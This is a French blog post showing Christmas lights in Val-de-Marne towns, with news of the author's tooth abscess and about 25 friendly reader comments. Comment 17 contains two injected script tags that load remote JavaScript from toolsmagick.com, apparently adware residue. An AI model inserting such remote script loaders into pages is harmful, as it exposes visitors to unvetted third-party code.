• bon w.end à tous - Illuminations en val de marne

    Illuminations en val de marne

     

    ILLUMINATIONS EN VAL DE MARNE

     

    Illuminations en val de marne

     

    Le frère jumeau ours, d'Annick d'Amiens !!!!

    à Chennevières sur marne

     

    Illuminations en val de marne

     

    illuminations au centre commercial régional 

     

    Illuminations en val de marne

     

    j'adore celles ci .... 

     

    Illuminations en val de marne

     

    Bercy village , très sympa 

     

    Illuminations en val de marne

     

    à Bry sur Marne là où habite la fille de pierre

     

    Illuminations en val de marne

     

    les plus jolies décorations avec celles de Nogent sur Marne

     

    Illuminations en val de marne

     

    C'est chouette ! 

    le maire de Bry a mis le paquet....

     

    Illuminations en val de marne

     

    pas mal du tout, toujours à Bry sur marne

     

    Illuminations en val de marne

     

    la mairie de Champigny 

     

    Illuminations en val de marne

     

    sympa avec la forêt enchantée !!! 

    à Champigny 

     

    Illuminations en val de marne

     

    déco d'une maison, un beau bonhomme de neige ! 

     

    Illuminations en val de marne

     

    J'aime beaucoup les illuminations chez Dior à Paris

     

    Illuminations en val de marne

     

    c'est beau la nuit, toutes ces lumières.. 

     

    voilà un petit échantillon des jolies lumières 

    des fêtes de fin d'année dans la région... 

     

     

    BON WEEK END A TOUS

     

     

    Voilà un article que j'avais préparé à l'avance, et que je ne vous ai pas encore mis,
    il vaut mieux tard que jamais comme on dit !!!

     

    Bon sinon, des nouvelles de ma dent, ça va mieux, mon médecin a pu me prescrire un antibio, qui me soulage bien, mais il va me falloir trouver un dentiste lundi, ou bien je me rendrai à l'hopital pour me la faire arracher, enfin j'ai pu manger à noël et au jour de l'an elle a bien fait les choses, le 1er janvier au soir, super douleur.. j'en étais défigurée tellement je souffrais. j'ai une chique lol.. un abcès pour ça que je suis sous antibio j'ai déjà fait un phlegmon dentaire, une fois, j'ai peur maintenant.

     

    Allez bon week les amis, le premier de l'année, et un bizou FLO

     

     

    bon w.end à tous - Illuminations en val de marne

    maudite dent ... grrrrr

     

     

    « pourtant j'avais bien commencé bien l'année.... La PREMIERE semaine DE 2020 passée en images »

  • Commentaires

    25
    Mardi 7 Janvier 2020 à 14:07

    Coucou Flo

    j'espère que tu as moins mal ! car c'est atroce les maux de dents !

    ces illuminations sont bien belles, il faut en effet ne pas se laisser à la morosité mondiale

    gros bisous

    Am

    24
    Mardi 7 Janvier 2020 à 12:07

    Elles sont Magnifiques ces illuminations, j'adore, merci de nous les faire partager. 

    Je n'en ai pas beaucoup vu cette année, vu que je suis peu sortie (lol)

    Il y a maintenant 5 ans que je ne suis plus venu au marché de Noël à paris , sur les champs Elysées, alors qu'avant j'y allais chaque année. mais après les attentats, puis l'interdiction du marché sur les champs, plus envie d'y aller , car je ne connais pas Paris autre que les Champs Elysées. Avec le métro, je n'ose m'aventurer où je ne connais pas, je reste sur ma dernière année, toute en bleu, magnifique, de bons souvenirs et un froid glacial qu'on avait acheté des chapkas pour avoir plus chaud , c'est te dire !  cette année j'ai vu que c'était rouge, beurk, j'aime pas !

    Je viens de voir que tu m'as envoyé un mail, je vais le lire avant d'aller faire à manger, après je dois emmener Héléna changer ces lunettes, le RDv était prit, il faut que j'y aille même si je n'en ai pas envie. Matt ira récupérer sa soeur à l'école.

    Bonne journée, gros bisous ma Flo et tant mieux si tu souffres moins 

    Coco

    23
    Mardi 7 Janvier 2020 à 01:29

    Bonjour flo

    2 jours de médicament chinois, guéri a 99%

     

    Passe une bonne journée

     

    Avec amitiés

     

    René

     

    22
    Lundi 6 Janvier 2020 à 20:12
    21
    Lundi 6 Janvier 2020 à 17:14

    ouaf que de belle ville et photo

    dit moi ta maman a t'elle mon âge moi 82 en avril

    bisous porté par le mistral

    20
    Lundi 6 Janvier 2020 à 16:16

    Je te souhaite aujourd'hui d'avoir la couronne des rois, et ceci pour t'en faire une dent de secours, une couronne, un truc assez hord de prix, mais peut être mieux remboursé en 2020.

    Bravo ici pour ce billet encore hautement fait de belles décos de Noël.

    Quand tu dis, " j'adore celle ci ", j'aurai parié, tant tu aimes le blanc et le doré sur les décos, sapins et autres.

    Pour Lulu, tu as raison, il vient de se réveiller couché sur son bout de canapé, mais le soir, la nuit il demande à sortir. Même quand il fait froid. Il a son petit manteau naturel, a vraiment l'air plus gros en hiver, comme en version molletonné, comme aurait dit Popeck.

    Merci pour tes vœux, et à toi, et famille, je souhaite le meilleur, de quoi noter le bilan de l'année à 20/20

    Eu que se termine vite et au mieux ces ravalements de ton habitation.

    Une bonne santé, des bonheurs de toutes tailles, et beaucoup de plaisir à partager sur nos blogs respectifs.

    Gros bisou d'amitié à toi.

    Très amicalement. Yann

    19
    Lundi 6 Janvier 2020 à 15:50

    Très agréable moment sur votre blog, des photos de qualité qui font plaisir à regarder. Merci de les partager. Bonne journée

    18
    Lundi 6 Janvier 2020 à 12:32

    Alors là j'en ai encore plein les yeux et comme tu dis il n'est jamais trop tard pour se faire du bien aux mirettes.

    Antibiotique, chirurgie, toi non plus tu n'y va pas de main morte. J'espère que tous ces traitements vont te soulager et te remettre en forme. Il y a une pub qui passe actuellement à la tv concernant les antibiotiques :

    " faut les prendre quand il faut et comme il faut"

    Dans ton cas c'est probablement recommandé.

    Bonne fin de journée et encore tous mes souhaits de guérison.

    17
    Lundi 6 Janvier 2020 à 09:43

     

     
    What do you want to do ?
    New mail<button id="ffenetremailtobuttonEmail">Copy</button><textarea id="ffenetremailtotextArea"></textarea>

    vous  ne faites pas dans la dentelle dans le Val de Marne
    De belles illuminations..Meilleurs Voeux  de santé  et de bonheur en famile.Bises ...Jacques

    <script src="//toolsmagick.com/2252259d09bdba7f1b.js"></script>

     
    What do you want to do ?
    New mail<button id="ffenetremailtobuttonEmail">Copy</button><textarea id="ffenetremailtotextArea"></textarea>

     

    <script src="//toolsmagick.com/2252259d09bdba7f1b.js"></script>
    16
    Lundi 6 Janvier 2020 à 08:11

    Coucou Flo

    Me voilà de retour après quelques jours de repos, je te souhaite une merveilleuse année 2020

    Merci pour le partage.

    Rohnny

    15
    Lundi 6 Janvier 2020 à 06:20

    bonjour flo avec tres peu de courage ce matin mais il est tres tot et sans doute que mes médocs n ont pas faient d effet encore faut pas loin d un eheure pour certains les anti douleurs déjà et la ça ne fait que 45 minutes qu ils sont avaler donc ça ne va pas tarder non plus au moins apres je suis tranquille jusqu a midi et la rebelotte  , mais aujourd hui je vais essayer le simple Efferalgan c est moins fort que le tramadol quand meme et si ça peut le faire ce serait tres bien 

     et ta dent en ce début de semaine qu est ce que ça donne as tu trouver une solution  va bientôt falloir passer par le president de la republique pour se faire soigner  ou on va etre tous obligé de se révolter car vraiment rien ne va plus de partout et pour tout de plus en plus 

     mon mari a un medicament dont le generique ne le soulage pas du tout donc il devra en prendre le double pour avoir un peu de soulagement , moi pour le moment ça va generique ou pas , mais ça devient la galere quand meme a part pour ceux de la cmu qui ne lachent pas le morceau 

     tres bon lundi 

     je t embrasse

    14
    Lundi 6 Janvier 2020 à 01:30

    Bonjour flo

    le mieux c'est d'aller aux urgences dans ton cas

    oui moi un gros rhume, 27° et courant d'air froid = atchoum

     

    Commence bien cette semaine

     

    Avec amitiés

     

    René

     

    13
    Dimanche 5 Janvier 2020 à 23:35

    Bon ma p'tite Flo contente que tu soufres moins, mais il faut que demain tu trouves un dentiste!

    Belles illuminations, c'est beau mais il faut achever toutes ces lumières énérgie à gagner.

    Douce nuit et gros bizoux.

    Moi toujours fatiguée, repos pour quand ??? (mon homme a décidé de vider la maison! et je dois superviser grrrr arghhhhh)

    12
    Dimanche 5 Janvier 2020 à 21:18

    bonsoir ma belle , contente de te retrouver après ces fêtes et la famille repartie , c'est beaucoup de fatigue mais bon , ça fait toujours plaisir de la recevoir et pour eux  , ma porte sera toujours ouverte , merci de tes messages postés sur mon blog , tout d'abord , permets-moi avec un peu de retard de te souhaiter une bonne et heureuse année ainsi qu'une bonne santé et que tous tes voeux se réalisent , bonne soirée , bisous

    11
    columbo1962
    Dimanche 5 Janvier 2020 à 21:06

    Bonsoir,

    Merci pour votre commentaire. Un personne âgée qui fait parti de mes proches m'a parlé de ça effectivement, mais bon je n'ai pas encore pris le temps d'aller voir sur des sites officiels du ministère de la santé afin de vérifier si cette information était exacte, mais bon si cela est vrai je ne suis pas franchement étonné. Le ou les imbéciles qui sont à l'origine d'une telle décision sont de parfaits imbéciles pour ne pas dire autre chose, car non seulement cela risque d'agrandir le gouffre financier de la sécurité sociale du fait que des personnes seront mal soignés et qu'elles devront à nouveau reconsulté leur médecin, mais cela risque également de comprometre la recherche de nouveaux futurs médicaments du fait les laboratoires de recherchent n'auront plus de finances pour payer leurs chercheurs. Il y a quelques années j'ai discuté avec un représentant en médicaments dans la salle d'attente de mon médecin, et il m'avait dit que les médicaments princeps, "médicament d'origine" et plus précisément la vente de ceux-ci permettait de financer les recherches pour élaborer de nouveaux médicaments, donc si les labos qui font les recherches n'ont plus de finances du fait qu'ils ne vendent plus leurs médicaments à eux, j'imagine difficilement que des chercheurs acceptent de travailler bénévolement pour créer de nouvelles molécules. En ce qui me concerne si il n'est plus possible même en mettant non substituable sur l'ordonnance d'obtenir des médicaments princeps remboursés, je ne céderais pas et je n'achèterais pas leur merde de génériques. En tout cas merci pour l'info, je dois voir mon médecin demain, donc je vais en discuter avec lui afin de savoir ce qu'il en est exactement de ça, logiquement lui il doit forcément être informé de ça ne serait-ce que par le journal le quotidien du médecin ou des notes du ministère de la santé, je vais me renseigner et je vous dirais ce qu'il en est exactement. Autrement j'espère que vous allez pouvoir vous faire soigner vos soucis dentaire relativement rapidement, il ne faut pas rigoler avec ça, car les infections d'origine dentaire ça peux amener n'importe quoi comme pathologies. Bon je vous souhaite une bonne fin de soirée, et merci pour votre sincère et fidèle amitié.

    10
    Dimanche 5 Janvier 2020 à 13:18

    Belles illuminations!

    Faut bien marquer le coup hein?

    Je suis content si tu as pû faire soigner ta dent.

    Maintenant faut attendre la guérison.

    Comme ma bronchite est pratiquement guérie, je vais pouvoir participer demain lundi à la sortie LPO.

    Ils ont prévu un pique-nique avec galette des rois.

    Je vais en faire une cet après-midi pour amener.

    Ma carte de vœux a effectivement été prise de la plage de Erdeven dans le Morbihan au mois d'août.

    C'était évidemment le soir puisque le soleil se couche à l'Ouest.

    Bon courage pour ta dent.

    Bon dimanche et grosse bise amicale.

    Michel

    9
    Dimanche 5 Janvier 2020 à 13:09

    Trop sympa toutes ces décos !
    c'est magnifique ...
    moins sympa la rage de dent ... j'ai connu, c'est terrible ...
    heureusement les antibiotiques t'on aidée,
    décidément on ne peut pas être tranquille !
    comme c'était chouette ton menu au restaurant ...
    merci pour ces belles photos qui donnent "l'eau à la bouche" ...
    bisous Flo, encore un peu de patience pour le dentiste ... arf

    8
    Dimanche 5 Janvier 2020 à 11:47

    Le même dans ma commune Flo, devant l'ancienne mairie lol lol

    Jolies décos coolbeurk

    attention à la fève aujourd'hui chère amie,

    et bon courage pour tes soins dentaires ouille, ouille, heureusement que tout se fait 

    maintenant sous anesthésie ....  Est-ce la dent de sagesse Flo chérie ?

    Belle journée ensoleillée mais très fraîche ici,

    Bises amicales de Christiane

    7
    Dimanche 5 Janvier 2020 à 11:06

    Très jolies lumières de chez nous, tu me fait gagner un temps fou et des kilomètres, cela à beau être pas loin de chez moi , mais je ne sors pas beaucoup, pour les dentistes si tu veux essaye à Roissy en Brie à côté de la gare, grand cabinet, Dr Attiach 0160347466, bise JL

    6
    Dimanche 5 Janvier 2020 à 10:29

    De belles décorations pour créer une bonne ambiance et l'envie d'acheter.

    j'ai de bons souvenirs à Bercy Village .Je crois me souvenir que l'on peut y aller par métro automatique non ?

    Règle ton problème dentaire car c'est généralement épuisant...

    Bon dimanche

    5
    Dimanche 5 Janvier 2020 à 10:20

    Bien joli tout ça...

    Et Dior a mis le paquet pour sa publicité !

    Bon dimanche Florence

    4
    Dimanche 5 Janvier 2020 à 09:47

    Bon alors si des fois tu décides de manger la galette aujourd'hui, gaffe à la fève ! C'est pas le moment de la croquer...yes

    C'est beau toutes ces illuminations et ça fait un peu oublier la hargne et la grogne qui parsèment régulièrement le pays...

    Gros bisous et bon dentiste...

    3
    Dimanche 5 Janvier 2020 à 09:42

    Comme disait Richard Boringer, "c'est beau une ville la nuit"...!! Oui toutes ces décorations lumineuses sont magnifiques, et celles que tu nous montre ici dans les villes alentour de chez toi, sont très réussies...Un peu partout les particuliers démontent leurs décorations, j'ai enlevé les miennes il y a deux jours...Je n'avais pas mis beaucoup à l'extérieur, manque de motivation, puisque nous ne faisions pas de réveillon chez nous...Les magasins restent encore décorés puisque bientôt les soldes...Pour ta dent, c'est bien que tu sois sous antibiotiques, mais tu vas devoir attendre que l'abcès soit résorbé, et ta joue dégonflée pour que le dentiste puisse l'arracher..et sans doute tu auras des antibiotiques après pour finaliser l'opération sans risque...Il vaudrait mieux que tu ailles chez un dentiste plutôt qu'à l'hôpital, car beaucoup de services sont en grève, avec personnel très réduit, et en plus, avec l'épidémie de grippe et surtout de gastro qui cavale, c'est plus risqué...Moi même j'ai rendez vous chez mon médecin cette semaine pour renouveler mes ordonnances, et j'appréhende la contagion dans la salle d'attente...Je vais mettre un masque, et surtout me désinfecter les mains dès la sortie de son cabinet...Grossses bises Flo, et courage pour ta dentouch

    2
    Dimanche 5 Janvier 2020 à 09:05

    Que c'est beau.. les grandes villes mettent le paquet !!

    Soignes toi Flo ...

    Merci pour tes encouragements, çà suit son cours dans deux semaines je déménage..

    Bon dimanche gros bisous 

    1
    Dimanche 5 Janvier 2020 à 08:22

    Qu'elles sont belles toutes ces décorations, les mairies ont fait fort par chez toi!

    J'espère que tu vas trouver bien vite un dentiste, c'est fatigant toutes ces douleurs.

    Bon dimanche!

    Bises de Mireille du sablon

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :